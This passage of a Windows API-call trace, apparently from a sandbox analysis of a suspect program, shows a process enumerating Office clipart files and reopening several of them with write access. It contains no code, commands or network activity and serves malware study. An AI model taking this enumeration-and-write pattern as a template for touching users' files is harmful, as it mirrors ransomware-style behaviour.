ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe70)) returned 1 [0104.522] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x61c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02097_.WMF", cAlternateFileName="")) returned 1 [0104.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.522] GetFileType (hFile=0x27c) returned 0x1 [0104.522] CloseHandle (hObject=0x27c) returned 1 [0104.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.522] GetFileType (hFile=0x27c) returned 0x1 [0104.522] CloseHandle (hObject=0x27c) returned 1 [0104.523] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x61c)) returned 1 [0104.523] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1234, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02115_.WMF", cAlternateFileName="")) returned 1 [0104.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.523] GetFileType (hFile=0x27c) returned 0x1 [0104.523] CloseHandle (hObject=0x27c) returned 1 [0104.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.523] GetFileType (hFile=0x27c) returned 0x1 [0104.523] CloseHandle (hObject=0x27c) returned 1 [0104.523] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1234)) returned 1 [0104.523] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf94, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02116_.WMF", cAlternateFileName="")) returned 1 [0104.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.525] GetFileType (hFile=0x27c) returned 0x1 [0104.525] CloseHandle (hObject=0x27c) returned 1 [0104.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.525] GetFileType (hFile=0x27c) returned 0x1 [0104.525] CloseHandle (hObject=0x27c) returned 1 [0104.525] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf94)) returned 1 [0104.525] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa4c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02141_.WMF", cAlternateFileName="")) returned 1 [0104.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.526] GetFileType (hFile=0x27c) returned 0x1 [0104.527] CloseHandle (hObject=0x27c) returned 1 [0104.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.527] GetFileType (hFile=0x27c) returned 0x1 [0104.527] CloseHandle (hObject=0x27c) returned 1 [0104.527] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa4c)) returned 1 [0104.527] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1510, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02153_.WMF", cAlternateFileName="")) returned 1 [0104.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.527] GetFileType (hFile=0x27c) returned 0x1 [0104.527] CloseHandle (hObject=0x27c) returned 1 [0104.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.528] GetFileType (hFile=0x27c) returned 0x1 [0104.528] CloseHandle (hObject=0x27c) returned 1 [0104.528] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1510)) returned 1 [0104.528] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02158_.WMF", cAlternateFileName="")) returned 1 [0104.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.528] GetFileType (hFile=0x27c) returned 0x1 [0104.528] CloseHandle (hObject=0x27c) returned 1 [0104.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID", lpUsedDefaultChar=0x0) returned 69 [0104.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID", lpUsedDefaultChar=0x0) returned 69 [0104.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF", lpUsedDefaultChar=0x0) returned 65 [0104.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID", lpUsedDefaultChar=0x0) returned 69 [0104.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID", lpUsedDefaultChar=0x0) returned 68 [0104.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft 